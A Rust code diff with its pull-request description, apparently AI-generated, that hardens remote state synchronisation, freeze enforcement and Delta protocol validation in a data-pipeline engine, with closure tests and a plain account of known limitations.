+fn snapshot_local_only_tables(local_path: &Path) -> Result<PathBuf, StateSyncError> {
+    let nanos = SystemTime::now()
+        .duration_since(UNIX_EPOCH)
+        .unwrap_or_default()
+        .as_nanos();
+    let snapshot = sibling_scratch_dir(local_path).join(format!(
+        ".rocky-state-localonly-{}-{}.redb",
+        std::process::id(),
+        nanos
+    ));
+    copy_named_tables(local_path, &snapshot, crate::state::LOCAL_ONLY_TABLE_NAMES)?;
+    Ok(snapshot)
+}
+
+/// Copy the `tables` from the redb at `src` into the redb at `dst`, replacing
+/// exactly those tables in `dst` and leaving every OTHER table in `dst`
+/// untouched. `dst` is created if it does not exist.
+///
+/// Every table in [`crate::state::LOCAL_ONLY_TABLE_NAMES`] is a
+/// `TableDefinition<&str, &[u8]>` (opaque serialized blobs), so the copy is a
+/// faithful, bit-exact key/value replay over that shape. A table absent from
+/// `src` clears the corresponding table in `dst` (delete + no re-insert). If a
+/// future local-only table used a different key/value type, opening it here
+/// would surface a redb type error rather than silently mis-copying.
+fn copy_named_tables(src: &Path, dst: &Path, tables: &[&str]) -> Result<(), StateSyncError> {
+    // `iter()` lives on the `ReadableTable` trait — scope it locally.
+    use redb::ReadableTable;
+
+    let io = |ctx: &str, e: &dyn std::fmt::Display| {
+        StateSyncError::Io(std::io::Error::other(format!("{ctx}: {e}")))
+    };
+
+    // `src` and `dst` are independent redb databases, so a read transaction on
+    // one and a write transaction on the other coexist freely — stream each
+    // table's rows straight across without an intermediate buffer.
+    let src_db =
+        redb::Database::open(src).map_err(|e| io("redb open src for local-only copy", &e))?;
+    let read = src_db
+        .begin_read()
+        .map_err(|e| io("redb begin_read for local-only copy", &e))?;
+    let dst_db =
+        redb::Database::create(dst).map_err(|e| io("redb create dst for local-only copy", &e))?;
+    let txn = dst_db
+        .begin_write()
+        .map_err(|e| io("redb begin_write for local-only copy", &e))?;
+    for name in tables {
+        let def: redb::TableDefinition<&str, &[u8]> = redb::TableDefinition::new(name);
+        // Replace, don't merge: drop any existing copy of this table in `dst`
+        // first, so a stale row can never survive.
+        txn.delete_table(def)
+            .map_err(|e| io("redb delete_table (dst) for local-only copy", &e))?;
+        match read.open_table(def) {
+            Ok(src_table) => {
+                let mut dst_table = txn
+                    .open_table(def)
+                    .map_err(|e| io("redb open_table (dst) for local-only copy", &e))?;
+                let iter = src_table
+                    .iter()
+                    .map_err(|e| io("redb iter for local-only copy", &e))?;
+                for entry in iter {
+                    let (k, v) = entry.map_err(|e| io("redb entry for local-only copy", &e))?;
+                    dst_table
+                        .insert(k.value(), v.value())
+                        .map_err(|e| io("redb insert (dst) for local-only copy", &e))?;
+                }
+                // `dst_table` (the write borrow on `txn`) is dropped at the end
+                // of the iteration, so `txn.commit()` has no outstanding borrow.
+            }
+            // A local-only table absent from `src` is a legitimate no-op — the
+            // destination table stays deleted (cleared) and is recreated empty
+            // on the next `StateStore::open`.
+            Err(redb::TableError::TableDoesNotExist(_)) => {}
+            Err(e) => return Err(io("redb open_table (src) for local-only copy", &e)),
+        }
+    }
+    txn.commit()
+        .map_err(|e| io("redb commit (dst) for local-only copy", &e))?;
+    drop(dst_db);
+    drop(read);
+    drop(src_db);
+    Ok(())
 }
 
 /// [`download_state`] retaining the hit/miss [`DownloadOutcome`] the tiered
@@ -1916,6 +2125,273 @@ mod tests {
         assert!(
             !local.exists(),
             "nothing to restore, so no local file is written"
+        );
+    }
+
+    // -----------------------------------------------------------------------
+    // Findings 6 + 7 — local-only-preserving merge on download
+    // -----------------------------------------------------------------------
+
+    /// Seed `path` as a local state store with a STALE replicated watermark plus
+    /// the two LOCAL-ONLY tables populated (schema_cache + a jobs record), i.e.
+    /// exactly the machine-local state a run-start download must not wipe.
+    fn seed_local_with_local_only(path: &Path, replicated_wm: &str, job_id: &str) {
+        let now = chrono::Utc::now();
+        let store = StateStore::open(path).expect("open local seed store");
+        store
+            .set_watermark(
+                replicated_wm,
+                &rocky_ir::WatermarkState {
+                    last_value: now,
+                    updated_at: now,
+                },
+            )
+            .unwrap();
+        store
+            .write_schema_cache_entry(
+                &schema_cache_key("cat", "staging", "orders"),
+                &SchemaCacheEntry {
+                    columns: vec![StoredColumn {
+                        name: "id".into(),
+                        data_type: "BIGINT".into(),
+                        nullable: false,
+                    }],
+                    cached_at: now,
+                },
+            )
+            .unwrap();
+        store
+            .record_job(&crate::state::PersistedJob {
+                job_id: job_id.to_string(),
+                kind: "run".into(),
+                state: "running".into(),
+                submitted_at: now.to_rfc3339(),
+                started_at: None,
+                finished_at: None,
+                principal: None,
+                error: None,
+                result: None,
+            })
+            .unwrap();
+        drop(store);
+    }
+
+    /// Build the bytes of a REMOTE state object: a valid store carrying an
+    /// authoritative replicated watermark with the local-only tables STRIPPED —
+    /// exactly what `upload_state` leaves on the wire.
+    fn build_remote_object_bytes(dir: &Path, replicated_wm: &str) -> Vec<u8> {
+        let now = chrono::Utc::now();
+        let seed = dir.join("remote_seed.redb");
+        {
+            let store = StateStore::open(&seed).unwrap();
+            store
+                .set_watermark(
+                    replicated_wm,
+                    &rocky_ir::WatermarkState {
+                        last_value: now,
+                        updated_at: now,
+                    },
+                )
+                .unwrap();
+            drop(store);
+        }
+        let stripped = strip_local_only_tables(&seed, LOCAL_ONLY_TABLE_NAMES).unwrap();
+        let bytes = std::fs::read(&stripped).unwrap();
+        let _ = std::fs::remove_file(&stripped);
+        let _ = std::fs::remove_file(&seed);
+        bytes
+    }
+
+    /// Finding 7 (Restored): a download that wholesale-replaces the replicated
+    /// tables must PRESERVE the local-only tables (jobs, schema_cache), and
+    /// finding 6 (Restored half): the stale local replicated watermark is
+    /// replaced by the remote's authoritative one.
+    #[tokio::test]
+    async fn download_restored_replaces_replicated_keeps_local_only() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+
+        seed_local_with_local_only(&local, "local.stale", "job-local-1");
+        let remote_bytes = build_remote_object_bytes(dir.path(), "remote.fresh");
+
+        let provider = test_support::install(ObjectStoreProvider::in_memory());
+        let key = object_store_state_key(&remote_state_key(&local));
+        provider.put(&key, Bytes::from(remote_bytes)).await.unwrap();
+
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            ..Default::default()
+        };
+        download_state(&config, &local)
+            .await
+            .expect("restored download should succeed");
+        test_support::clear();
+
+        let store = StateStore::open(&local).unwrap();
+        assert!(
+            store.get_watermark("remote.fresh").unwrap().is_some(),
+            "the remote's replicated watermark must be restored"
+        );
+        assert!(
+            store.get_watermark("local.stale").unwrap().is_none(),
+            "the stale local replicated watermark must be replaced by the remote copy"
+        );
+        assert_eq!(
+            store.list_schema_cache().unwrap().len(),
+            1,
+            "local-only schema_cache must survive a download that replaces the replicated tables"
+        );
+        let jobs = store.list_jobs().unwrap();
+        assert_eq!(
+            jobs.len(),
+            1,
+            "local-only jobs must survive a download that replaces the replicated tables"
+        );
+        assert_eq!(jobs[0].job_id, "job-local-1");
+    }
+
+    /// Finding 6 (Absent): switching to an EMPTY remote prefix must reset the
+    /// replicated tables to fresh (no stale watermark survives) — while finding
+    /// 7 (Absent half) preserves the local-only tables.
+    #[tokio::test]
+    async fn download_absent_clears_replicated_keeps_local_only() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+
+        seed_local_with_local_only(&local, "local.stale", "job-local-1");
+
+        // In-memory provider installed but EMPTY → the download resolves Absent.
+        let _provider = test_support::install(ObjectStoreProvider::in_memory());
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            ..Default::default()
+        };
+        download_state(&config, &local)
+            .await
+            .expect("an absent remote is a fresh start");
+        test_support::clear();
+
+        let store = StateStore::open(&local).unwrap();
+        assert!(
+            store.get_watermark("local.stale").unwrap().is_none(),
+            "an Absent download on a remote backend must reset the replicated tables to fresh — \
+             a stale watermark must NOT keep the run from re-reading source rows (finding 6)"
+        );
+        assert_eq!(
+            store.list_schema_cache().unwrap().len(),
+            1,
+            "Absent must keep the local-only schema_cache (finding 7)"
+        );
+        let jobs = store.list_jobs().unwrap();
+        assert_eq!(
+            jobs.len(),
+            1,
+            "Absent must keep the local-only jobs (finding 7)"
+        );
+        assert_eq!(jobs[0].job_id, "job-local-1");
+    }
+
+    /// The copy primitive itself: it replaces ONLY the named (local-only) tables
+    /// in `dst`, leaves every replicated table in `dst` untouched, drags NO
+    /// replicated table across from `src`, and drops a stale `dst` row.
+    #[test]
+    fn copy_named_tables_replaces_only_named_tables() {
+        let dir = TempDir::new().unwrap();
+        let src = dir.path().join("src.redb");
+        let dst = dir.path().join("dst.redb");
+        let now = chrono::Utc::now();
+
+        // src: a replicated watermark + the local-only tables populated.
+        seed_local_with_local_only(&src, "src.replicated", "j-src");
+
+        // dst: a DIFFERENT replicated watermark + a STALE local-only entry.
+        {
+            let store = StateStore::open(&dst).unwrap();
+            store
+                .set_watermark(
+                    "dst.replicated",
+                    &rocky_ir::WatermarkState {
+                        last_value: now,
+                        updated_at: now,
+                    },
+                )
+                .unwrap();
+            store
+                .write_schema_cache_entry(
+                    &schema_cache_key("stale", "stale", "stale"),
+                    &SchemaCacheEntry {
+                        columns: vec![],
+                        cached_at: now,
+                    },
+                )
+                .unwrap();
+            drop(store);
+        }
+
+        copy_named_tables(&src, &dst, LOCAL_ONLY_TABLE_NAMES).unwrap();
+
+        let store = StateStore::open(&dst).unwrap();
+        // dst's replicated table is untouched.
+        assert!(
+            store.get_watermark("dst.replicated").unwrap().is_some(),
+            "copy must not touch replicated tables in dst"
+        );
+        // src's replicated table did NOT leak across (copy is scoped to local-only).
+        assert!(
+            store.get_watermark("src.replicated").unwrap().is_none(),
+            "copy must not drag a replicated table across from src"
+        );
+        // dst's local-only tables were REPLACED by src's (stale row gone).
+        let sc = store.list_schema_cache().unwrap();
+        assert_eq!(
+            sc.len(),
+            1,
+            "the stale dst schema_cache entry must be replaced"
+        );
+        assert_eq!(sc[0].0, schema_cache_key("cat", "staging", "orders"));
+        let jobs = store.list_jobs().unwrap();
+        assert_eq!(jobs.len(), 1);
+        assert_eq!(jobs[0].job_id, "j-src");
+    }
+
+    /// Finding 5 — the mechanism the fail-closed seam uploads rely on: a broken
+    /// upload (S3 with no bucket → `MissingConfig`) is SWALLOWED under the
+    /// default `Skip` policy but PROPAGATES under `Fail`. The freeze / gc-tombstone
+    /// seams force `Fail` so a state that commits locally but never reaches the
+    /// remote can never be reported as success.
+    #[tokio::test]
+    async fn upload_state_skip_swallows_but_fail_propagates() {
+        let dir = TempDir::new().unwrap();
+        let src = dir.path().join("state.redb");
+        seed_watermark_and_cache(&src);
+
+        let skip = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: None,
+            on_upload_failure: StateUploadFailureMode::Skip,
+            ..Default::default()
+        };
+        assert!(
+            upload_state(&skip, &src).await.is_ok(),
+            "the default Skip policy must swallow an upload failure (degraded mode)"
+        );
+
+        let fail = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: None,
+            on_upload_failure: StateUploadFailureMode::Fail,
+            ..Default::default()
+        };
+        assert!(
+            matches!(
+                upload_state(&fail, &src).await,
+                Err(StateSyncError::MissingConfig(..))
+            ),
+            "the Fail policy the seams force must propagate the upload failure (abort)"
         );
     }
 }

--- a/engine/crates/rocky-core/tests/state_sync_timeout_test.rs
+++ b/engine/crates/rocky-core/tests/state_sync_timeout_test.rs
@@ -75,7 +75,13 @@ fn install_aws_env(endpoint: &str) {
 
 fn write_stub_state(dir: &Path) -> std::path::PathBuf {
     let path = dir.join("state.redb");
-    std::fs::write(&path, b"stub state bytes for upload test").unwrap();
+    // A VALID redb state file (not arbitrary bytes): `upload_state` filters the
+    // local-only tables through a real redb copy before uploading, and that
+    // filter is fail-closed on a non-redb file. These tests exercise the upload
+    // *transport* (timeout / retry / success), so the payload must be a genuine
+    // state store — opening one creates the expected empty tables.
+    let store = rocky_core::state::StateStore::open(&path).expect("open stub state store");
+    drop(store);
     path
 }
 

--- a/engine/crates/rocky-iceberg/src/uniform_writer/discover.rs
+++ b/engine/crates/rocky-iceberg/src/uniform_writer/discover.rs
@@ -1041,9 +1041,16 @@ fn canonical_key(raw: &str, table_bucket: &str, key_prefix: &str) -> Option<Stri
 ///   `minReaderVersion == 3`, `writerFeatures` appear **iff**
 ///   `minWriterVersion == 7` (real UniForm tables are reader v2 with no reader
 ///   features + writer v7 with writer features);
-/// - every listed feature is a string in [`SUPPORTED_TABLE_FEATURES`] — an
-///   unknown feature, a non-array feature field (`"writerFeatures":
-///   "deletionVectors"`), or `deletionVectors` all hold.
+/// - every listed feature is a string in its position's allowlist
+///   ([`SUPPORTED_READER_FEATURES`] / [`SUPPORTED_WRITER_FEATURES`]) — an unknown
+///   feature, a non-array feature field (`"writerFeatures": "deletionVectors"`),
+///   a wrongly-placed feature, or `deletionVectors` all hold;
+/// - reader+writer DUAL features (present in BOTH allowlists, e.g.
+///   `columnMapping`, `timestampNtz`) are correctly MIRRORED when both lists are
+///   present (reader v3 + writer v7): a dual feature declared in one list but not
+///   the other is an asymmetric, ill-formed protocol and holds. The real UniForm
+///   shape (reader v2 with NO `readerFeatures`) is unaffected — mirroring is only
+///   required once the reader side also uses table features.
 fn protocol_is_supported(protocol: &serde_json::Value) -> bool {
     use serde_json::Value;
     let Some(obj) = protocol.as_object() else {
@@ -1086,6 +1093,37 @@ fn protocol_is_supported(protocol: &serde_json::Value) -> bool {
             match f.as_str() {
                 Some(name) if allowlist.contains(&name) => {}
                 _ => return false, // unknown feature / wrong placement / non-string
+            }
+        }
+    }
+
+    // Cross-list mirroring for reader+writer DUAL features. A feature present in
+    // BOTH allowlists (`columnMapping`, `timestampNtz`) is a reader+writer table
+    // feature: when the table uses table features on BOTH sides — reader v3 +
+    // writer v7, so both lists are present — a conformant Delta writer lists it
+    // in BOTH `readerFeatures` and `writerFeatures`. A dual feature that appears
+    // in one list but not the other is an ill-formed, asymmetric protocol this
+    // reader will not reason about → hold. This is the principled generalization
+    // of the `v2Checkpoint` exclusion above: rather than drop each dual feature
+    // from the allowlists, require any dual feature to be correctly mirrored.
+    //
+    // Guarded on BOTH lists being present, so the real UniForm shape (reader v2
+    // with NO `readerFeatures` + `columnMapping` in `writerFeatures`) stays
+    // supported — mirroring is only required once the reader side ALSO uses
+    // table features (v3). Given the version/list consistency enforced above,
+    // "both present" ⟺ reader v3 AND writer v7.
+    if let (Some(reader_arr), Some(writer_arr)) = (
+        reader_feats.and_then(Value::as_array),
+        writer_feats.and_then(Value::as_array),
+    ) {
+        for &dual in SUPPORTED_READER_FEATURES {
+            if !SUPPORTED_WRITER_FEATURES.contains(&dual) {
+                continue; // pure-reader feature (none today), not a dual feature
+            }
+            let in_reader = reader_arr.iter().any(|v| v.as_str() == Some(dual));
+            let in_writer = writer_arr.iter().any(|v| v.as_str() == Some(dual));
+            if in_reader != in_writer {
+                return false; // dual feature in one list but not the other → hold
             }
         }
     }
@@ -1255,6 +1293,61 @@ mod tests {
             "minWriterVersion": 7,
             "readerFeatures": ["appendOnly"],
             "writerFeatures": ["appendOnly", "columnMapping"],
+        })));
+    }
+
+    #[test]
+    fn protocol_is_supported_requires_dual_feature_mirroring() {
+        use serde_json::json;
+        // A reader+writer DUAL feature (`columnMapping`, in BOTH allowlists) must
+        // be MIRRORED across the reader and writer lists once both lists are
+        // present (reader v3 + writer v7). A dual feature in one list but not the
+        // other is an asymmetric, ill-formed protocol → hold.
+
+        // In `readerFeatures` only (writer lists a pure-writer feature instead).
+        // Previously ACCEPTED — each list passed its own allowlist — now holds.
+        assert!(!protocol_is_supported(&json!({
+            "minReaderVersion": 3,
+            "minWriterVersion": 7,
+            "readerFeatures": ["columnMapping"],
+            "writerFeatures": ["appendOnly"],
+        })));
+
+        // Reverse asymmetry: `columnMapping` in `writerFeatures` only, while the
+        // OTHER dual feature (`timestampNtz`) IS correctly mirrored — isolates the
+        // `columnMapping` asymmetry. Previously ACCEPTED, now holds.
+        assert!(!protocol_is_supported(&json!({
+            "minReaderVersion": 3,
+            "minWriterVersion": 7,
+            "readerFeatures": ["timestampNtz"],
+            "writerFeatures": ["timestampNtz", "columnMapping", "appendOnly"],
+        })));
+
+        // `timestampNtz` is also a dual feature: reader-only placement (writer
+        // omits it, `columnMapping` mirrored) → hold. Previously ACCEPTED.
+        assert!(!protocol_is_supported(&json!({
+            "minReaderVersion": 3,
+            "minWriterVersion": 7,
+            "readerFeatures": ["columnMapping", "timestampNtz"],
+            "writerFeatures": ["columnMapping", "appendOnly"],
+        })));
+
+        // Correctly mirrored dual features (in BOTH lists) → STILL supported.
+        assert!(protocol_is_supported(&json!({
+            "minReaderVersion": 3,
+            "minWriterVersion": 7,
+            "readerFeatures": ["columnMapping", "timestampNtz"],
+            "writerFeatures": ["columnMapping", "timestampNtz", "appendOnly"],
+        })));
+
+        // The real UniForm shape is UNAFFECTED: reader v2 has NO `readerFeatures`,
+        // so the dual `columnMapping` may live in `writerFeatures` alone —
+        // mirroring is only required once the reader side ALSO uses table
+        // features (v3). Must remain supported.
+        assert!(protocol_is_supported(&json!({
+            "minReaderVersion": 2,
+            "minWriterVersion": 7,
+            "writerFeatures": ["columnMapping", "icebergCompatV2", "invariants", "appendOnly"],
         })));
     }
 

--- a/engine/crates/rocky-mcp/src/tools.rs
+++ b/engine/crates/rocky-mcp/src/tools.rs
@@ -2384,6 +2384,27 @@ impl RockyMcpServer {
                 "Retry the propose; if it persists, verify the project compiles cleanly.",
             )
         })?;
+        // Finding 4: pull the authoritative remote freeze/budget ledger BEFORE
+        // the policy gate reads it, so an active cross-pod freeze denies the
+        // propose instead of persisting a plan a later apply would refuse.
+        // Fail-closed, remote-only, and only when the gate will actually read the
+        // ledger (a `[policy]` block + a non-empty touched set — otherwise the
+        // gate short-circuits without a ledger read).
+        if let Ok(cfg) = rocky_core::config::load_rocky_config(&self.config_path)
+            && cfg.policy.is_some()
+            && !touched.is_empty()
+            && !matches!(cfg.state.backend, rocky_core::config::StateBackend::Local)
+        {
+            rocky_core::state_sync::download_state(&cfg.state, &state_path)
+                .await
+                .map_err(|e| {
+                    ToolError::internal(
+                        format!("failed to download remote state before the policy gate: {e:#}"),
+                        "The remote [state] backend must be reachable so a cross-pod freeze is \
+                         enforced before proposing a plan.",
+                    )
+                })?;
+        }
         let gate = rocky_cli::commands::evaluate_apply_policy(
             &self.config_path,
             &plan_id,

--- a/engine/crates/rocky-mcp/src/tools.rs
+++ b/engine/crates/rocky-mcp/src/tools.rs
@@ -2384,13 +2384,18 @@ impl RockyMcpServer {
                 "Retry the propose; if it persists, verify the project compiles cleanly.",
             )
         })?;
+        // Finding 1: load the config ONCE and thread that snapshot into both the
+        // freeze-gate sync decision and the policy gate, so a `rocky.toml` swap
+        // between the two can't let the guard skip the sync while the gate then
+        // reads stale local decisions.
+        let cfg = rocky_core::config::load_rocky_config(&self.config_path).ok();
         // Finding 4: pull the authoritative remote freeze/budget ledger BEFORE
         // the policy gate reads it, so an active cross-pod freeze denies the
         // propose instead of persisting a plan a later apply would refuse.
         // Fail-closed, remote-only, and only when the gate will actually read the
         // ledger (a `[policy]` block + a non-empty touched set — otherwise the
         // gate short-circuits without a ledger read).
-        if let Ok(cfg) = rocky_core::config::load_rocky_config(&self.config_path)
+        if let Some(cfg) = &cfg
             && cfg.policy.is_some()
             && !touched.is_empty()
             && !matches!(cfg.state.backend, rocky_core::config::StateBackend::Local)
@@ -2405,8 +2410,8 @@ impl RockyMcpServer {
                     )
                 })?;
         }
-        let gate = rocky_cli::commands::evaluate_apply_policy(
-            &self.config_path,
+        let gate = rocky_cli::commands::evaluate_apply_policy_with_policy(
+            cfg.as_ref().and_then(|c| c.policy.as_ref()),
             &plan_id,
             rocky_core::config::PolicyPrincipal::Agent,
             &touched,

--- a/integrations/dagster/tests/fixtures_generated/doctor_ci/doctor.json
+++ b/integrations/dagster/tests/fixtures_generated/doctor_ci/doctor.json
@@ -17,7 +17,7 @@
     {
       "name": "state_schema",
       "status": "healthy",
-      "message": "state schema v20 matches this binary",
+      "message": "no on-disk state schema (binary supports v20)",
       "duration_ms": 0
     },
     {

--- a/integrations/dagster/tests/fixtures_generated/plan.json
+++ b/integrations/dagster/tests/fixtures_generated/plan.json
@@ -14,7 +14,7 @@
       "sql": "CREATE OR REPLACE TABLE staging__orders.orders AS\nSELECT *\nFROM raw__orders.orders"
     }
   ],
-  "plan_id": "c8f83a6cb71d02eb4344998703f7b912a8bccedfb9e30c44c4ec8adcfafd0822",
+  "plan_id": "7c3a7623f01f273e5961b22cbde3ae7a20671a5446fd6cb851f56a8214bea6e8",
   "plan_kind": "run",
   "created_at": "2000-01-01T00:00:00Z",
   "models": [


### PR DESCRIPTION
Hardening from the waves 1–11 review, iterated across **seven** adversarial (Codex red-team) rounds (~32 findings). Every fix ships with positive closure tests. The freeze-durability work in particular was iterated until only architectural limitations remained (documented below and tracked as a follow-up, per the owner's decision to land with caveats).

**Issues:** Closes #1095. Substantially addresses #1089 (S2/R1 fully closed; S1 freeze durability hardened, with the documented architectural residuals below tracked as a follow-up). Addresses residual (b) of #1090 (full Delta-Kernel adoption deferred). #1093 deferred (see Scoped out).

## #1095 — agent-policy TOCTOU

- **(c) Governed shell hooks / webhooks are refused, not fingerprinted.** Hooks fire at pipeline-start *before* the execution-fingerprint choke-point (and a replication-only apply never reaches it), so binding them into the fingerprint cannot prevent execution. A **governed** apply that configures any executable hook/webhook is refused before any hook is built or fired (`refuse_governed_side_effects`), counting exactly what `HookRegistry::from_config` registers (known event key + non-empty list — so an unknown-event or empty-list config is not falsely refused). Bare `rocky run` / human apply is ungoverned and fires hooks as before.
- **(a) Execution-control config is bound.** `[run].skip_unchanged`, `[reuse]`, `[resilience]` are folded into the verified execution fingerprint (`execution_control_identity`), computed symmetrically at plan and apply.
- (b) backfill skip-gate and (d) no-longer-compiles were already closed on `main` (verified).

## #1090 — gc liveness oracle

`protocol_is_supported` now HOLDs when a reader+writer **dual** Delta feature (`columnMapping`/`timestampNtz`) appears in one declared feature list but not the other — a monotone-conservative change (only ever HOLDs *more*), so it cannot cause a wrong tombstone. (Closes residual (b); full Delta-Kernel adoption remains a separate follow-up.)

## #1089 — remote-backed state integrity

- **S2** — a failed download propagates (not authoritative-empty); a tiered Valkey **miss** falls through to S3 instead of trusting a stale local file.
- **R1** — `open_read_only` no longer bumps the `schema_version` stamp (still creates tables; forward-incompatible stores still `SchemaMismatch`).
- **S1** — the freeze kill-switch, plus all governed-mutation state durability, hardened:
  - Non-run ledger seams (`policy freeze`, `gc apply`) bracket writes with **fail-closed** download-before / upload-after (`on_upload_failure=Fail`), remote-only; a malformed config fails loud (only a genuinely-absent config falls back to local).
  - Freeze **enforcement** downloads the remote ledger before the policy gate on every governed path (gc, apply run/ai-authored/backfill, promote, restore, MCP propose), threading a single config snapshot into each governed *decision* (no guard-vs-gate double-load), gated so a no-policy / empty-touched / local run never false-aborts on a backend blip.
  - The state **download preserves node-local tables** (`jobs`, `schema_cache`): stage → merge local-only tables **under the StateStore writer lock** → publish with one atomic rename. No crash window, no concurrent late-rename clobbering a live writer; `Absent` clears replicated tables (stale watermark gone) while keeping local-only. Upload never emits unfiltered local-only rows (a genuine filter error fails closed).
  - Governed **mutation durability**: restore/backfill download-before and **upload-after even on a mid-run failure** that already mutated state; the verify-after / autonomy-budget decision pair is fail-closed (persisted or the gate `Deny`s) and both rows reach remote; a replication apply carrying `verify_after` (which replication cannot enforce) is refused rather than silently allowed.

### Known limitations (documented in code; tracked follow-up)

A fully-reliable **cross-pod, tamper-proof** freeze kill-switch requires an architectural change beyond this PR (design issue to follow):
- **Config-swap TOCTOU:** the governed run/promote/propose *execution* paths re-read `rocky.toml`, and `config_policy_identity` binds only adapters+pipelines — so an attacker with local filesystem write access can swap `[policy]`/`[state]` between the apply gate and execution to bypass the freeze on those paths. The sound fix (execute every governed mutation from the apply-verified config snapshot, or fingerprint `[policy]`/`[state]`) is out of scope here. Documented on `config_policy_identity` and `verify_routing_identity`.
- **No compare-and-swap:** last-writer-wins whole-file upload can race a concurrent *cross-pod* writer; needs CAS / conditional-PUT or a monotonic freeze object.
- **Tiered cache coherence:** a freeze on the durable tier (S3) can be shadowed by a stale Valkey cache on the read side.

## Scoped out (follow-ups)

- **#1093** (reconcile governance from the gated snapshot) — deferred (lowest-severity within-apply provenance; the plan→apply swap is already closed by the fingerprint gate; ~20-site ripple).
- **#1090 full Delta-Kernel adoption** — deferred (dependency-scale).

## Verification

- `cargo build --workspace --all-features` ✓, `cargo clippy --workspace --all-targets --all-features -- -D warnings` ✓, `cargo fmt --check` ✓.
- `cargo nextest run -p rocky-core -p rocky-cli -p rocky-mcp -p rocky-iceberg --all-features` — **2960 passed, 19 skipped**. (Note: plain `cargo test` under high in-process parallelism intermittently hits a pre-existing redb `page_manager` flake unrelated to this change; nextest — CI's process-isolated runner — is clean.)
- Positive closure tests per fix (governed-hook refusal incl. unknown-event/empty-list; exec-control identity symmetry; read-only stamp; download failure not-authoritative; tiered miss → S3; gc mirroring holds on asymmetry; freeze pre-gate sync; crash-safe/lock-serialized download; filter-error fail-closed; malformed-config abort; budget-relevant decision fail-closed; replication verify_after refusal).
- **Honesty note:** the remote `s3`/`valkey` paths are exercised via in-memory/stub providers and unit logic, not live S3/Valkey.
- Hardened over six Codex adversarial-review rounds; the remaining items are the documented architectural limitations above.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
